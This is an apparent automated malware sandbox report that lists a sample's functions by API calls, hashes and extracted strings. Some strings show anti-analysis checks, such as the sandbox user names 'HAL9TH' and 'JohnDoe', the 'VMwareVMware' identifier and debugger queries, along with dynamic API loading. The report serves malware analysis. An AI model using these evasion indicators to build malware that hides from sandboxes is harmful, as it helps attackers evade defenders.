Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Heap$AllocComputerNameProcess
String ID:
API String ID: 4203777966-0
Opcode ID: e87addc3917c1582652ae1521c80a92d529d285b71a0c17ec3e8cc84417c586a
Instruction ID: f11edcf30a3937a6bf13aa21ee565a1a4d2718e968f7f5cc493714258eaccb72
Opcode Fuzzy Hash: e87addc3917c1582652ae1521c80a92d529d285b71a0c17ec3e8cc84417c586a
Instruction Fuzzy Hash: 5AD017B17003206FE6209B2ABC0CF873AACEFC9B61B990070FC05C3250D3348846C6A9

Function 0040106E Relevance: 4.5, APIs: 3, Instructions: 14memoryCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00401071
VirtualAllocExNuma.KERNEL32 ref: 0040108E
ExitProcess.KERNEL32 ref: 004010AA

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Process$AllocCurrentExitNumaVirtual
String ID:
API String ID: 1103761159-0
Opcode ID: 5ee9d7473c3924204ca57906dc96219f516d74c2ff55c0a1b6b29943125a55b7
Instruction ID: cbeecf13432bd86b07881f9954f5d2781a3b91bd5f6aa0d8a48ab97a10eed13d
Opcode Fuzzy Hash: 5ee9d7473c3924204ca57906dc96219f516d74c2ff55c0a1b6b29943125a55b7
Instruction Fuzzy Hash: 6EE0B6709087408AE310BF789A09329BAF0BB54702F80467AEC8591165EB7845998A9B

Function 00401011 Relevance: 3.8, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32 ref: 00401024
memset.MSVCRT ref: 0040104A
VirtualFree.KERNEL32(00000000,001E5D70,00008000), ref: 00401064

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreememset
String ID:
API String ID: 3122926387-0
Opcode ID: a0a013b6774e571c5b65a47fc1d3d360eda1f497b9a4925a01a31c340fd8a1f6
Instruction ID: 953efe50e1cbbb812f06cc3e62367a8be46cf4bdbcb976bc8bbce204aaafe815
Opcode Fuzzy Hash: a0a013b6774e571c5b65a47fc1d3d360eda1f497b9a4925a01a31c340fd8a1f6
Instruction Fuzzy Hash: 4DF0273268267467E12032383C09FBBA398AF02B54F905136FD84F32A1E651595541E8

Function 00784FDA Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00785002
Module32First.KERNEL32(00000000,00000224), ref: 00785022

Memory Dump Source

Source File: 00000011.00000002.3453206176.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_780000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 1a921dc0fd6f9c52f8410fea6ab76c2c27c22abc82dec712cdc5c27d124d250c
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: B9F09631140715BFD7203BF5AD8DB6EB6ECAF49724F140528E642910C0EBB8EC454BA1

Function 00800E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,00800223,?,?), ref: 00800E19
SetErrorMode.KERNEL32(00000000,?,?,00800223,?,?), ref: 00800E1E

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 35e25f2094d7412dce1cc438058ce985fdbe1067a02941d8344aff89e07d3d4c
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 3CD0123114512877D7402A94DC09BCD7B1CDF05B62F008411FB0DE9080C770994046E5

Function 00414AE0 Relevance: 1.5, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00414B18

Part of subcall function 0041370E: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,004073A7,0042EEFC), ref: 00413732

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: FolderPathlstrcpy
String ID:
API String ID: 1699248803-0
Opcode ID: ab4a8321712fcc922be74a85797a0249bd995a8b6693096a5be71d41bf5f0982
Instruction ID: 2708b0e3243a0e957b98e2de8dbff298e4be506c05b60b3b5688325687bc23d0
Opcode Fuzzy Hash: ab4a8321712fcc922be74a85797a0249bd995a8b6693096a5be71d41bf5f0982
Instruction Fuzzy Hash: 22F065F56042406FE3109B29DC84D7BBBECEBC8755F00882CF9C897341D6349D15C6A1

Function 00414AB3 Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNEL32(00000000,?,?,?,00401F5C,?,00000000,?,0042EEFC), ref: 00414AC8

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: e7eeef91b189e3eb156169286097dafbbf83a662e1d22db4b58308e2dade1027
Instruction ID: 9a9555821b1b5639991f33a0d047dc28d6ef73e7f338c8467c625410a53c9249
Opcode Fuzzy Hash: e7eeef91b189e3eb156169286097dafbbf83a662e1d22db4b58308e2dade1027
Instruction Fuzzy Hash: C8D0A7BB70172A4B5B006EAA1C55CCF530EEFC029A301043FF50093150CA145E0A46A5

Function 00784C99 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 00784CEA

Memory Dump Source

Source File: 00000011.00000002.3453206176.0000000000780000.00000040.00001000.00020000.00000000.sdmp, Offset: 00780000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_780000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: e9cf63de8b45e1d3f257ad0f025873a6de224d32035eeb2c5cdea4907b740315
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 6C113C79A40208EFDB01DF98C985E98BBF5EF08351F058094FA489B362D375EA50DF90

Function 00414B34 Relevance: 1.3, APIs: 1, Instructions: 28memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNEL32(00000040,?,?,?,00000000,0040B194,?,?,?,?,?,?,?), ref: 00414B4F

Memory Dump Source

Source File: 00000011.00000002.3451554221.0000000000400000.00000040.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.3451554221.0000000000436000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000447000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000045A000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000484000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000489000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.000000000048D000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004BA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004C2000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004DB000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004E4000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000004EA000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005AC000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.00000000005B9000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000643000.00000040.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000011.00000002.3451554221.0000000000647000.00000040.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_400000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 0c83796e71d9fd92b85acab00c076ac88b98b03ee52731056f74553e5987f3df
Instruction ID: c5585fe1be56caf24d44a51d4f7cb6acd98d7c2f993cc92adb08f3e4ce33ffd0
Opcode Fuzzy Hash: 0c83796e71d9fd92b85acab00c076ac88b98b03ee52731056f74553e5987f3df
Instruction Fuzzy Hash: 61E0D87630D3924B97608EA854C0FA7A79CABD9F41B0A006EFA44D7301D650EC45C778

Non-executed Functions

Function 0081C858 Relevance: 119.6, APIs: 67, Strings: 1, Instructions: 649libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(00000000,?,00000031,?,?,0081B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 0081CE10
LoadLibraryA.KERNEL32(?,0081B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 0081CE21
LoadLibraryA.KERNEL32(?,0081B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 0081CE32
LoadLibraryA.KERNEL32(?,0081B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 0081CE43
LoadLibraryA.KERNEL32(?,0081B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 0081CE54
LoadLibraryA.KERNEL32(?,0081B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 0081CE65
LoadLibraryA.KERNEL32(?,0081B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 0081CE76
LoadLibraryA.KERNEL32(?,0081B2B7,0042EEFC,0042EEFC,0042EEFC), ref: 0081CE87
GetProcAddress.KERNEL32(00644FE4), ref: 0081CEDD
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CEF4
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CF0B
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CF22
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CF39
GetProcAddress.KERNEL32(00644FE8), ref: 0081CF58
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CF6F
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CF86
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CF9D
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CFB4
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CFCB
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CFE2
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081CFF9
GetProcAddress.KERNEL32(00644FEC), ref: 0081D014
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D02B
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D042
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D059
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D070
GetProcAddress.KERNEL32(00644FF0), ref: 0081D08F
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D0A6
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D0BD
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D0D4
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D0EB
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D102
GetProcAddress.KERNEL32(00644FF8), ref: 0081D121
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D138
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D14F
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D166
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D17D
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D194
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D1AB
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D1C2
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D1D9
GetProcAddress.KERNEL32(00645000), ref: 0081D1F4
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D20B
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D222
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D239
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D250
GetProcAddress.KERNEL32(00645004), ref: 0081D26B
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D282
GetProcAddress.KERNEL32(00645008), ref: 0081D29D
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D2B4
GetProcAddress.KERNEL32(00644FF4), ref: 0081D2D3
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D2EA
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D301
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D318
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D32F
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D346
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D35D
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D374
GetProcAddress.KERNEL32(00644FFC), ref: 0081D44B
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D462
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D479
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D490
GetProcAddress.KERNEL32(00645014), ref: 0081D4AB
GetProcAddress.KERNEL32(00645018), ref: 0081D4C6
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D4DD
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D4F4
GetProcAddress.KERNEL32(?,0081B2B7), ref: 0081D50B

Strings

B, xrefs: 0081CD87

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID: B
API String ID: 2238633743-3806887055
Opcode ID: 68d40025ba20cdd3d247030dc32b72d75d51eb3007a989a3fac0a133a93af85d
Instruction ID: 7976046cae7d61ae370928133a56c624193f07d1480eb3c478f67f303fc57e07
Opcode Fuzzy Hash: 68d40025ba20cdd3d247030dc32b72d75d51eb3007a989a3fac0a133a93af85d
Instruction Fuzzy Hash: 4962C27D805640EFDB429F65FD06B643FA7FB4BB01B14712AE9128A272DB324854DF90

Function 00810937 Relevance: 73.9, APIs: 49, Instructions: 421memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 008107F6: lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081083C
Part of subcall function 008107F6: strchr.MSVCRT ref: 00810856
Part of subcall function 008107F6: strchr.MSVCRT ref: 0081086E
Part of subcall function 008107F6: lstrlen.KERNEL32(?), ref: 00810882
Part of subcall function 008107F6: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0081089A
Part of subcall function 008107F6: strcpy_s.MSVCRT ref: 00810915

GetProcessHeap.KERNEL32(?,?,?), ref: 00810989
strcpy_s.MSVCRT ref: 008109A4
GetProcessHeap.KERNEL32(?,?,?), ref: 008109B0
HeapFree.KERNEL32(00000000,00000000,?,?,?,?), ref: 008109BB
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 008109E3
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 008109ED
GetProcessHeap.KERNEL32(?,?,?), ref: 008109FD
strcpy_s.MSVCRT ref: 00810A19
GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00810A25
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 00810A30
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 00810A4B
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 00810A55
GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00810A65
strcpy_s.MSVCRT ref: 00810A81
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 00810A91
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00810A9C
GetProcessHeap.KERNEL32(?,?), ref: 00810AAF
HeapFree.KERNEL32(00000000,00000000,?,?,?), ref: 00810AB9
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?), ref: 00810ADA
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 00810AE4
GetProcessHeap.KERNEL32(?,?,?), ref: 00810AF4
strcpy_s.MSVCRT ref: 00810B12
GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00810B1E
HeapFree.KERNEL32(00000000,00000000,00644E40,?,?,?,?,?,?), ref: 00810B28
lstrlen.KERNEL32(00000000,?,?,?,?,?,?), ref: 00810B2F
GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00810B42
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,?,?), ref: 00810B79
strcpy_s.MSVCRT ref: 00810BB1
GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 00810BC9
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?), ref: 00810BD4
lstrlen.KERNEL32(?,?,?,?,?,?,?), ref: 00810BDB
GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00810BEE
strcpy_s.MSVCRT ref: 00810C07
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00810C0F
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00810C1A
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00810C45
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00810C4F
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00810C5F
strcpy_s.MSVCRT ref: 00810C7B
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00810C87
HeapFree.KERNEL32(00000000,00000000,00644E40), ref: 00810C92
GetProcessHeap.KERNEL32(?,?,?,?,?,?,?), ref: 00810D35
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 00810D3F
GetProcessHeap.KERNEL32(?,?,?), ref: 00810D76
GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00810D83
HeapFree.KERNEL32(00000000,00000000,00644E40,?,?,?), ref: 00810D8D
GetProcessHeap.KERNEL32(?,?,?,?,?,?), ref: 00810DD6
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?), ref: 00810DE1
memcpy.MSVCRT(?,?,?), ref: 00810E16

Memory Dump Source

Source File: 00000011.00000002.3453516621.0000000000800000.00000040.00001000.00020000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_c2bea0d661.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$strcpy_s$lstrlen$strchr$memcpy
String ID:
API String ID: 3553499935-0
Opcode ID: 975215ca6a6fb4d5367f80fe5ca197d0c8580447b4b488d64dec9b9a6ed5d922
Instruction ID: 2506f08b9c55f13792273fd8203a0018079d86179887f8c450c629829a7257de
Opcode Fuzzy Hash: 975215ca6a6fb4d5367f80fe5ca197d0c8580447b4b488d64dec9b9a6ed5d922
Instruction Fuzzy Hash: D6E19EB5504314AFD720AFA5AC49B6B7BADFF89750F004929F885C7241DFB0AD44CBA2

Function 00402BEB Relevance: 35.1, Strings: 28, Instructions: 135COMMON

Download Yara Rule

Strings

HAL9TH, xrefs: 00402E97, 00402EB8
GetDevic, xrefs: 00402D30
ReleaseD, xrefs: 00402D6D
ntdll.dl, xrefs: 00402C8F
DISPLAY, xrefs: 00402EF5
GetUserN, xrefs: 00402CC2
ReleaseDC, xrefs: 00402D75, 00402D8D
DISPLAY, xrefs: 00402EFD, 00402F0C
%hu/%hu/, xrefs: 00402F1F
user32.d, xrefs: 00402C21
crypt32.dll, xrefs: 00402C63, 00402C7C
NtQueryInformationProcess, xrefs: 00402E49
user32.dll, xrefs: 00402C29, 00402C48
crypt32., xrefs: 00402C5B
%hu/%hu/%hu, xrefs: 00402F27, 00402F40
JohnDoe, xrefs: 00402ED3, 00402EE2
CreateDC, xrefs: 00402CFD
GetUserNameA, xrefs: 00402CCA, 00402CEA
sscanf, xrefs: 00402DF4, 00402E15
VMwareVMware, xrefs: 00402E64, 00402E84
CreateDCA, xrefs: 00402D05, 00402D1D
CryptStringToBinaryA, xrefs: 00402DE1
gdi32.dl, xrefs: 00402BEE
JohnDoe, xrefs: 00402ECB
